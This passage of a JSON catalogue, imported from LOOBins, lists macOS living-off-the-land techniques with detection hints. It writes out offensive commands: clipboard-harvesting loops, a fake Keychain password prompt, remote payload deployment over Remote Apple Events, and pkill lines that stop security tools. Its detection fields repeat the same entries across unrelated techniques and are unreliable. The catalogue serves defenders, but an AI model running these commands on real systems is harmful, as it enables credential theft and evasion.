"https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osacompile.yml", 4345 "https://redcanary.com/blog/mac-application-bundles/" 4346 ] 4347 }, 4348 { 4349 "id": "loobins:osascript:eb192e839a2c73e1", 4350 "toolId": "loobins:osascript", 4351 "toolName": "osascript", 4352 "name": "Use the osascript binary to gather sensitive clipboard data", 4353 "source": "LOOBins", 4354 "platform": [ 4355 "macOS" 4356 ], 4357 "capability": [ 4358 "Collection", 4359 "Credential Access" 4360 ], 4361 "nativeCategory": [ 4362 "Collection", 4363 "Credential Access" 4364 ], 4365 "command": "while true; do echo $(osascript -e 'return (the clipboard)') >> clipdata.txt; sleep 10; done", 4366 "description": "A bash loop can gather clipboard contents over a defined time period. The following command calls /usr/bin/osascript -e 'return (the clipboard)' indefinitely every 10 seconds and writes clipboard content to a text file.", 4367 "mitre": [], 4368 "fullPath": [ 4369 "/usr/bin/osascript" 4370 ], 4371 "environment": [ 4372 "Local host" 4373 ], 4374 "availability": "Built in", 4375 "verification": "Upstream reference", 4376 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4377 "detection": [ 4378 { 4379 "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", 4380 "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" 4381 }, 4382 { 4383 "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", 4384 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" 4385 }, 4386 { 4387 "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", 4388 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" 4389 }, 4390 { 4391 "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", 4392 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" 4393 }, 4394 { 4395 "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", 4396 "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" 4397 }, 4398 { 4399 "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", 4400 "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" 4401 } 4402 ], 4403 "references": [ 4404 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", 4405 "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", 4406 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 4407 ] 4408 }, 4409 { 4410 "id": "loobins:osascript:e7145a781a0f1138", 4411 "toolId": "loobins:osascript", 4412 "toolName": "osascript", 4413 "name": "Use the osascript binary to gather system information", 4414 "source": "LOOBins", 4415 "platform": [ 4416 "macOS" 4417 ], 4418 "capability": [ 4419 "Collection", 4420 "Discovery" 4421 ], 4422 "nativeCategory": [ 4423 "Collection", 4424 "Discovery" 4425 ], 4426 "command": "osascript -e 'return (system info)'", 4427 "description": "osascript can be used to gather the operating system version, current username, user ID, computer name, IP address, and other information.", 4428 "mitre": [], 4429 "fullPath": [ 4430 "/usr/bin/osascript" 4431 ], 4432 "environment": [ 4433 "Local host" 4434 ], 4435 "availability": "Built in", 4436 "verification": "Upstream reference", 4437 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4438 "detection": [ 4439 { 4440 "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", 4441 "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" 4442 }, 4443 { 4444 "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", 4445 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" 4446 }, 4447 { 4448 "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", 4449 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" 4450 }, 4451 { 4452 "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", 4453 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" 4454 }, 4455 { 4456 "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", 4457 "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" 4458 }, 4459 { 4460 "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", 4461 "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" 4462 } 4463 ], 4464 "references": [ 4465 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", 4466 "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", 4467 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 4468 ] 4469 }, 4470 { 4471 "id": "loobins:osascript:d587958586ecaf12", 4472 "toolId": "loobins:osascript", 4473 "toolName": "osascript", 4474 "name": "Use the osascript binary to prompt the user for credentials", 4475 "source": "LOOBins", 4476 "platform": [ 4477 "macOS" 4478 ], 4479 "capability": [ 4480 "Credential Access" 4481 ], 4482 "nativeCategory": [ 4483 "Credential Access" 4484 ], 4485 "command": "osascript -e 'set popup to display dialog \"Keychain Access wants to use the login keychain\" & return & return & \"Please enter the keychain password\" & return default answer \"\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:FileVaultIcon.icns\" with title \"Authentication Needed\" with hidden answer'", 4486 "description": "osascript can be used to generate a dialogue box and request the user to enter the keychain password.", 4487 "mitre": [], 4488 "fullPath": [ 4489 "/usr/bin/osascript" 4490 ], 4491 "environment": [ 4492 "Local host" 4493 ], 4494 "availability": "Built in", 4495 "verification": "Upstream reference", 4496 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4497 "detection": [ 4498 { 4499 "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", 4500 "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" 4501 }, 4502 { 4503 "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", 4504 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" 4505 }, 4506 { 4507 "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", 4508 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" 4509 }, 4510 { 4511 "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", 4512 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" 4513 }, 4514 { 4515 "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", 4516 "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" 4517 }, 4518 { 4519 "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", 4520 "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" 4521 } 4522 ], 4523 "references": [ 4524 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", 4525 "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", 4526 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 4527 ] 4528 }, 4529 { 4530 "id": "loobins:osascript:eee928fec29a8165", 4531 "toolId": "loobins:osascript", 4532 "toolName": "osascript", 4533 "name": "Use the osascript binary to execute a JXA (JavaScript for Automation) file.", 4534 "source": "LOOBins", 4535 "platform": [ 4536 "macOS" 4537 ], 4538 "capability": [ 4539 "Execution" 4540 ], 4541 "nativeCategory": [ 4542 "Execution" 4543 ], 4544 "command": "echo \"ObjC.import('Cocoa');\\nObjC.import('stdlib');\\nvar currentApp = Application.currentApplication();\\ncurrentApp.includeStandardAdditions = true;\\ncurrentApp.doShellScript('open -a Calculator.app');\" > calc.js && osascript -l JavaScript calc.js", 4545 "description": "JXA is often used by red teams (and potentially attackers) as a macOS payload, as JXA is native to macOS and can access various internal macOS APIs (such as Cocoa, Foundation, OSAKit, etc.). The osascript binary can be used to execute JXA payloads by simply running \"osascript [file.js]\" but some malware or offensive tools may also use \"osascript -l JavaScript [file.js]\".", 4546 "mitre": [], 4547 "fullPath": [ 4548 "/usr/bin/osascript" 4549 ], 4550 "environment": [ 4551 "Local host" 4552 ], 4553 "availability": "Built in", 4554 "verification": "Upstream reference", 4555 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4556 "detection": [ 4557 { 4558 "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", 4559 "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" 4560 }, 4561 { 4562 "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", 4563 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" 4564 }, 4565 { 4566 "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", 4567 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" 4568 }, 4569 { 4570 "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", 4571 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" 4572 }, 4573 { 4574 "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", 4575 "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" 4576 }, 4577 { 4578 "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", 4579 "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" 4580 } 4581 ], 4582 "references": [ 4583 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", 4584 "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", 4585 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 4586 ] 4587 }, 4588 { 4589 "id": "loobins:osascript:f761e47f7cf28e2e", 4590 "toolId": "loobins:osascript", 4591 "toolName": "osascript", 4592 "name": "Execute shell commands via osascript do shell script", 4593 "source": "LOOBins", 4594 "platform": [ 4595 "macOS" 4596 ], 4597 "capability": [ 4598 "Execution", 4599 "Defense Evasion", 4600 "Privilege Escalation" 4601 ], 4602 "nativeCategory": [ 4603 "Execution", 4604 "Defense Evasion", 4605 "Privilege Escalation" 4606 ], 4607 "command": "osascript -e 'do shell script \"id\"'", 4608 "description": "osascript's 'do shell script' handler executes arbitrary shell commands through the AppleScript runtime. Commands spawned this way are children of osascript rather than the calling shell, which can bypass detection logic tied to specific parent-child process relationships. The 'with administrator privileges' flag triggers a native macOS authentication prompt and runs the command as root if the user authenticates, without requiring sudo.", 4609 "mitre": [], 4610 "fullPath": [ 4611 "/usr/bin/osascript" 4612 ], 4613 "environment": [ 4614 "Local host" 4615 ], 4616 "availability": "Built in", 4617 "verification": "Upstream reference", 4618 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4619 "detection": [ 4620 { 4621 "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", 4622 "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" 4623 }, 4624 { 4625 "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", 4626 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" 4627 }, 4628 { 4629 "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", 4630 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" 4631 }, 4632 { 4633 "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", 4634 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" 4635 }, 4636 { 4637 "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", 4638 "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" 4639 }, 4640 { 4641 "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", 4642 "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" 4643 } 4644 ], 4645 "references": [ 4646 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", 4647 "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", 4648 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 4649 ] 4650 }, 4651 { 4652 "id": "loobins:osascript:a48177c8d82f5af7", 4653 "toolId": "loobins:osascript", 4654 "toolName": "osascript", 4655 "name": "Remote command execution over SSH using osascript do shell script", 4656 "source": "LOOBins", 4657 "platform": [ 4658 "macOS" 4659 ], 4660 "capability": [ 4661 "Lateral Movement", 4662 "Execution" 4663 ], 4664 "nativeCategory": [ 4665 "Lateral Movement", 4666 "Execution" 4667 ], 4668 "command": "ssh -i key.pem user@<TARGET_IP> 'bash -s' <<'EOF'\nosascript -e 'do shell script \"id\"'\nEOF", 4669 "description": "osascript's 'do shell script' handler can be invoked over an SSH session to execute arbitrary shell commands on a remote macOS host. This technique requires only SSH access to the target. Unlike when using Remote Apple Events (eppc://) with osascript, it does not require port 3031 to be accessible, Remote Apple Events to be enabled, or the target application to be running. This makes it viable against hosts where eppc:// is blocked by the firewall or disabled in System Settings, and against headless or server Macs that have no active GUI session.", 4670 "mitre": [], 4671 "fullPath": [ 4672 "/usr/bin/osascript" 4673 ], 4674 "environment": [ 4675 "Local host" 4676 ], 4677 "availability": "Built in", 4678 "verification": "Upstream reference", 4679 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4680 "detection": [ 4681 { 4682 "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", 4683 "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" 4684 }, 4685 { 4686 "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", 4687 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" 4688 }, 4689 { 4690 "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", 4691 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" 4692 }, 4693 { 4694 "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", 4695 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" 4696 }, 4697 { 4698 "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", 4699 "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" 4700 }, 4701 { 4702 "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", 4703 "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" 4704 } 4705 ], 4706 "references": [ 4707 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", 4708 "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", 4709 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 4710 ] 4711 }, 4712 { 4713 "id": "loobins:osascript:1b57fc0621ffd467", 4714 "toolId": "loobins:osascript", 4715 "toolName": "osascript", 4716 "name": "Mount SMB volume without GUI using osascript mount volume", 4717 "source": "LOOBins", 4718 "platform": [ 4719 "macOS" 4720 ], 4721 "capability": [ 4722 "Lateral Movement" 4723 ], 4724 "nativeCategory": [ 4725 "Lateral Movement" 4726 ], 4727 "command": "osascript -e 'mount volume \"smb://user:<PASSWORD>@<TARGET_IP>/share\"'", 4728 "description": "osascript can mount an SMB share on the local machine using the 'mount volume' command. This approach bypasses the macOS GUI requirement for enabling Windows File Sharing password storage on the target, which is required when using the mount command directly. The share is mounted to /Volumes/<sharename> and its contents are immediately accessible as local files.", 4729 "mitre": [], 4730 "fullPath": [ 4731 "/usr/bin/osascript" 4732 ], 4733 "environment": [ 4734 "Local host" 4735 ], 4736 "availability": "Built in", 4737 "verification": "Upstream reference", 4738 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4739 "detection": [ 4740 { 4741 "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", 4742 "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" 4743 }, 4744 { 4745 "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", 4746 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" 4747 }, 4748 { 4749 "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", 4750 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" 4751 }, 4752 { 4753 "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", 4754 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" 4755 }, 4756 { 4757 "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", 4758 "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" 4759 }, 4760 { 4761 "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", 4762 "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" 4763 } 4764 ], 4765 "references": [ 4766 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", 4767 "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", 4768 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 4769 ] 4770 }, 4771 { 4772 "id": "loobins:osascript:a3236c80ab72db2e", 4773 "toolId": "loobins:osascript", 4774 "toolName": "osascript", 4775 "name": "Remote payload deployment via Terminal.app as a Remote Apple Events proxy", 4776 "source": "LOOBins", 4777 "platform": [ 4778 "macOS" 4779 ], 4780 "capability": [ 4781 "Execution", 4782 "Lateral Movement" 4783 ], 4784 "nativeCategory": [ 4785 "Execution", 4786 "Lateral Movement" 4787 ], 4788 "command": "osascript <<EOF\ntell application \"Terminal\" of machine \"eppc://${VICTIM_USER}:${VICTIM_PASS}@${VICTIM_IP}\"\n do script \"echo \\\"${PAYLOAD_B64}\\\" | base64 --decode > ${REMOTE_SCRIPT_PATH} && chmod +x ${REMOTE_SCRIPT_PATH}\" in window 1\nend tell\nEOF\n\nosascript <<EOF\ntell application \"Terminal\" of machine \"eppc://${VICTIM_USER}:${VICTIM_PASS}@${VICTIM_IP}\"\n do script \"bash ${REMOTE_SCRIPT_PATH}\" in window 1\nend tell\nEOF", 4789 "description": "The System Events application blocks remote do shell script execution via Remote Apple Events (RAE), returning a -10016 Handler Error. Terminal.app does not have this restriction and accepts remote do script commands over the eppc:// protocol. This makes Terminal.app an effective execution proxy. Payloads are Base64-encoded before transmission to avoid AppleScript parsing errors (-2741) caused by multi-line scripts. The deployment is a two-stage process - the first RAE command decodes the payload to a temporary path and sets execute permissions, and the second invokes it via bash. This technique can also be classified as a Software Deployment Tool (T1072) - it operates via Apple Events IPC rather than standard shell processes, creating a telemetry gap in security tooling focused on process execution trees.", 4790 "mitre": [], 4791 "fullPath": [ 4792 "/usr/bin/osascript" 4793 ], 4794 "environment": [ 4795 "Local host" 4796 ], 4797 "availability": "Built in", 4798 "verification": "Upstream reference", 4799 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4800 "detection": [ 4801 { 4802 "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", 4803 "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" 4804 }, 4805 { 4806 "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", 4807 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" 4808 }, 4809 { 4810 "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", 4811 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" 4812 }, 4813 { 4814 "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", 4815 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" 4816 }, 4817 { 4818 "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", 4819 "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" 4820 }, 4821 { 4822 "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", 4823 "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" 4824 } 4825 ], 4826 "references": [ 4827 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", 4828 "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", 4829 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 4830 ] 4831 }, 4832 { 4833 "id": "loobins:osascript:c01ea000e14e56db", 4834 "toolId": "loobins:osascript", 4835 "toolName": "osascript", 4836 "name": "Remote volume enumeration via Finder over Remote Apple Events", 4837 "source": "LOOBins", 4838 "platform": [ 4839 "macOS" 4840 ], 4841 "capability": [ 4842 "Discovery", 4843 "Lateral Movement" 4844 ], 4845 "nativeCategory": [ 4846 "Discovery", 4847 "Lateral Movement" 4848 ], 4849 "command": "osascript -e 'tell application \"Finder\" of machine \"eppc://user:password@<TARGET_IP>\" to get name of every disk'", 4850 "description": "The Finder application is scriptable over Remote Apple Events (RAE) via the eppc:// URI scheme. osascript can address a remote Finder instance to query mounted volumes on the target machine, providing an adversary with immediate insight into available network shares and external storage. These actions are performed via Apple Events IPC rather than shell commands, bypassing security telemetry focused on process execution.", 4851 "mitre": [], 4852 "fullPath": [ 4853 "/usr/bin/osascript" 4854 ], 4855 "environment": [ 4856 "Local host" 4857 ], 4858 "availability": "Built in", 4859 "verification": "Upstream reference", 4860 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4861 "detection": [ 4862 { 4863 "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", 4864 "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" 4865 }, 4866 { 4867 "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", 4868 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" 4869 }, 4870 { 4871 "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", 4872 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" 4873 }, 4874 { 4875 "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", 4876 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" 4877 }, 4878 { 4879 "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", 4880 "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" 4881 }, 4882 { 4883 "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", 4884 "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" 4885 } 4886 ], 4887 "references": [ 4888 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", 4889 "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", 4890 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 4891 ] 4892 }, 4893 { 4894 "id": "loobins:pbpaste:652de80e6c1533ef", 4895 "toolId": "loobins:pbpaste", 4896 "toolName": "pbpaste", 4897 "name": "Use pbpaste to collect sensitive clipboard data", 4898 "source": "LOOBins", 4899 "platform": [ 4900 "macOS" 4901 ], 4902 "capability": [ 4903 "Credential Access", 4904 "Collection" 4905 ], 4906 "nativeCategory": [ 4907 "Credential Access", 4908 "Collection" 4909 ], 4910 "command": "while true; do echo $(pbpaste) >> loot.txt; sleep 10; done", 4911 "description": "A pbpaste bash loop can continuously collect clipboard contents every x minutes and write contents to a file (or another location). This may allow an attacker to gather user credentials or collect other sensitive information.", 4912 "mitre": [], 4913 "fullPath": [ 4914 "/usr/bin/pbpaste" 4915 ], 4916 "environment": [ 4917 "Local host" 4918 ], 4919 "availability": "Built in", 4920 "verification": "Upstream reference", 4921 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4922 "detection": [ 4923 { 4924 "type": "Sigma: Clipboard Data Collection Via Pbpaste", 4925 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules-threat-hunting/macos/process_creation/proc_creation_macos_pbpaste_execution.yml" 4926 } 4927 ], 4928 "references": [ 4929 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pbpaste.yml", 4930 "https://medium.com/@NullByteWht/hacking-macos-how-to-dump-1password-keepassx-lastpass-passwords-in-plaintext-723c5b1c311b", 4931 "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-b65" 4932 ] 4933 }, 4934 { 4935 "id": "loobins:pkill:1fe342f7502ca679", 4936 "toolId": "loobins:pkill", 4937 "toolName": "pkill", 4938 "name": "Kill security tools", 4939 "source": "LOOBins", 4940 "platform": [ 4941 "macOS" 4942 ], 4943 "capability": [ 4944 "Defense Evasion" 4945 ], 4946 "nativeCategory": [ 4947 "Defense Evasion" 4948 ], 4949 "command": "pkill -f \"Little Snitch|ESET|osqueryd|Falcon\"", 4950 "description": "Terminate defensive processes like firewalls, AV, or monitoring tools.", 4951 "mitre": [], 4952 "fullPath": [ 4953 "/usr/bin/pkill" 4954 ], 4955 "environment": [ 4956 "Local host" 4957 ], 4958 "availability": "Built in", 4959 "verification": "Upstream reference", 4960 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4961 "detection": [ 4962 { 4963 "type": "Process execution monitoring for pkill", 4964 "value": "Process execution monitoring for pkill" 4965 }, 4966 { 4967 "type": "Endpoint Detection - pkill targeting security tools", 4968 "value": "Endpoint Detection - pkill targeting security tools" 4969 } 4970 ], 4971 "references": [ 4972 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml", 4973 "https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer", 4974 "https://ss64.com/mac/pkill.html" 4975 ] 4976 }, 4977 { 4978 "id": "loobins:pkill:5a5a01fbc83306af", 4979 "toolId": "loobins:pkill", 4980 "toolName": "pkill", 4981 "name": "Force kill processes with SIGKILL", 4982 "source": "LOOBins", 4983 "platform": [ 4984 "macOS" 4985 ], 4986 "capability": [ 4987 "Defense Evasion" 4988 ], 4989 "nativeCategory": [ 4990 "Defense Evasion" 4991 ], 4992 "command": "pkill -9 osqueryd", 4993 "description": "Use the -9 signal to forcefully terminate processes that may not respond to normal termination signals. Useful for killing hung security tools.", 4994 "mitre": [], 4995 "fullPath": [ 4996 "/usr/bin/pkill" 